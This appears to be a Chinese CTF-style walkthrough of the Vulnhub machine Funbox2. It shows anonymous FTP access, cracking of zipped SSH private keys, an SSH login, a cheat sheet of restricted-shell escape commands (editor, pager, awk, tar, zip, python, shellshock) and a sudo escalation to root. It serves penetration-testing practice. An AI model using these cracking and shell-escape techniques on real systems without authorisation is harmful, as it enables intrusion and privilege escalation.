官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Vulnhub靶场攻略---Funbox2-cookie
- 关注
Vulnhub靶场攻略---Funbox2-cookie
信息收集
└─\# cat nmapscan/info
# Nmap 7.93 scan initiated Sun Aug 13 21:13:54 2023 as: nmap -sT -sV -sC -O -p21,80,22 -o nmapscan/info 10.20.30.139
Nmap scan report for 10.20.30.139
Host is up (0.00057s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9467dfe0c4da97e2d77740fa2517251 (RSA)
| 256 15004667809b40123a0c6607db1d1847 (ECDSA)
|_ 256 75ba6695bb0f16de7e7ea17b273bb058 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:CB:50:B8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
\# Nmap done at Sun Aug 13 21:14:03 2023 -- 1 IP address (1 host up) scanned in 9.10 seconds
找到21端口开放的ftp服务允许匿名登录
端口渗透
ftp--21端口渗透
匿名登录
└─# ftp 10.20.30.139
Connected to 10.20.30.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:10.20.30.139]
Name (10.20.30.139:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@10.20.30.129 !
230-
230-The local time is: Mon Aug 14 02:04:39 2023
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||24301|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp>
ftp服务中是很多压缩文件,看文件名像是用户名信息,将文件都下载到本地。
zip密码破解
1.zip2john
└─\# unzip anna.zip
Archive: anna.zip
[anna.zip] id_rsa password:
skipping: id_rsa incorrect password
┌──(root㉿kali)-[/home/kali/vulnhub/Funbox2/zip_dir]
└─\# unzip -l anna.zip
Archive: anna.zip
Length Date Time Name
--------- ---------- ----- ----
1675 2020-07-25 06:42 id_rsa
--------- -------
1675 1 file
└─\# ls
anna.zip ariel.zip bud.zip homer.zip john.zip miriam.zip tom.zip_hash zlatan.zip_hash
anna.zip.hash ariel.zip_hash cathrine.zip jessica.zip marge.zip tom zlatan.zip
┌──(root㉿kali)-[/home/kali/vulnhub/Funbox2/zip_dir]
└─\# zip2john anna.zip > anna.zip_hash
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(root㉿kali)-[/home/kali/vulnhub/Funbox2/zip_dir]
└─\# john anna.zip_hash -w /usr/share/wordlists/rockyou.txt
对拿到的所有zip文件破解,文件中的id_rsa私钥文件可以用来ssh连接
最后破解到tom.zip时成功破解得到一个密码,其他文件都没有找到正确的密码
2.fcrackzip
└─\# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u tom.zip
PASSWORD FOUND!!!!: pw == iubire
ssh--22端口渗透
└─\# ssh -i id_rsa tom@10.20.30.139
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Aug 14 02:12:34 UTC 2023
System load: 0.22 Processes: 161
Usage of /: 67.2% of 4.37GB Users logged in: 0
Memory usage: 44% IP address for ens33: 10.20.30.139
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Aug 14 01:35:14 2023 from 10.20.30.129
tom@funbox2:~$
权限提升
/bin/rbash
1.什么是rbash
它与一般shell的区别在于会限制一些行为,让一些命令无法执行。
2.如何设置一个rbash
cp /bin/bash /bin/rbash #复制一个bash,重命名为rbash
useradd -s /bin/rbash test #设置用户test登录的shell为rbash
mkdir -p /home/test/.bin #在test用户目录下新建一个.bin目录存放可以执行的命令
枚举Linux环境(为逃逸做信息收集)
1.检查可用的命令
cd、ls、su
2.检查可用的操作符
> >> < | and so on
3.root身份可以运行的命令
sudo -l
4.检查shell
echo $SHELL
5.检查可用的编程语言
python、php、perl、ruby
6.检查环境变量
env /printenv
常见逃逸技术
1."/"字符被允许
如果/被允许可以执行:/bin/bash
2.cp命令被允许
可以直接复制/bin/bash到本地用户目录,同时的满足可以使用/才能执行test文件。
cp /bin/bash test1
cp /bin/sh test2
./test1
./test2
3.常见应用
探测系统中是否存在常见应用
FTP,GDB(调试程序的工具)等。
- 执行:ftp > !/bin/bash
- 执行: gdb > !/bin/bashman/git
- 执行: man > !/bin/bash
- 执行: git > git help statusvi/vim
vim test #进入vi/vim
:!/bin/bash #在命令模式执行
more/less
more test
!/bin/bash #同样利用打开文件可以在下面运行命令的特点
4.set shell(DC-2)
在一些编辑器中可以设置shell变量然后执行,如vim中
# 进入vim/vi
:set shell=/bin/bash
:shell
#切换完成之后换药添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
5.更改PATH或SHELL环境变量
执行:export -p #查看系统的环境变量设置
PATH和SHELL变量的权限设置很可能是:"-rx",这就意味这我们只能执行和读取,不能写入。如果有w权限的话,我们可以直接给他写入/bin/bash
6.编程语言
python
python -c "import pty;pty.spawn('/bin/bash')"
python -c "import os;os.system('/bin/bash')"
php
php -a then exec("sh/bash -i")
perl
perl -e "exec '/bin/bash';"
lua
os.execute('/bin/bash')
ruby
exec "/bin/bash"
7.其他方法尝试
ssh
ssh username@IP -t "/bin/sh" or "/bin/bash"
ssh2
ssh username@IP -t "bash --noprofile"
ssh3
ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
ssh4
ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
zip
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
tar
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
awk
awk 'BEGIN {system("/bin/bash")}'
8.另类方法
在命令行依次执行如下所示命令
#利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a
#添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
sudo巧用
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
tom@funbox2:~$
tom@funbox2:~$ sudo /bin/bash
root@funbox2:~\# whoami
root
root@funbox2:~\# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:cb:50:b8 brd ff:ff:ff:ff:ff:ff
inet 10.20.30.139/24 brd 10.20.30.255 scope global dynamic ens33
valid_lft 1214sec preferred_lft 1214sec
inet6 fe80::20c:29ff:fecb:50b8/64 scope link
valid_lft forever preferred_lft forever
root@funbox2:~\# cat /root/flag.txt
____ __ __ _ __ ___ ____ _ __ ___
/ __/ / / / / / |/ / / _ ) / __ \ | |/_/ |_ |
/ _/ / /_/ / / / / _ |/ /_/ / _> < / __/
/_/ \____/ /_/|_/ /____/ \____/ /_/|_| __ /____/
____ ___ ___ / /_ ___ ___/ / / /
_ _ _ / __// _ \/ _ \/ __// -_)/ _ / /_/
(_)(_)(_)/_/ \___/\___/\__/ \__/ \_,_/ (_)
from @0815R2d2 with ♥
root@funbox2:~\#
总结
ubuntu18单用户模式,
rw signie init=/bin/bash
修改网卡信息
cd /etc/netplan
vi .yml
netplan apply
/etc/init.d/networking restart
ifup ens33
ifdown ens33
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者
文章目录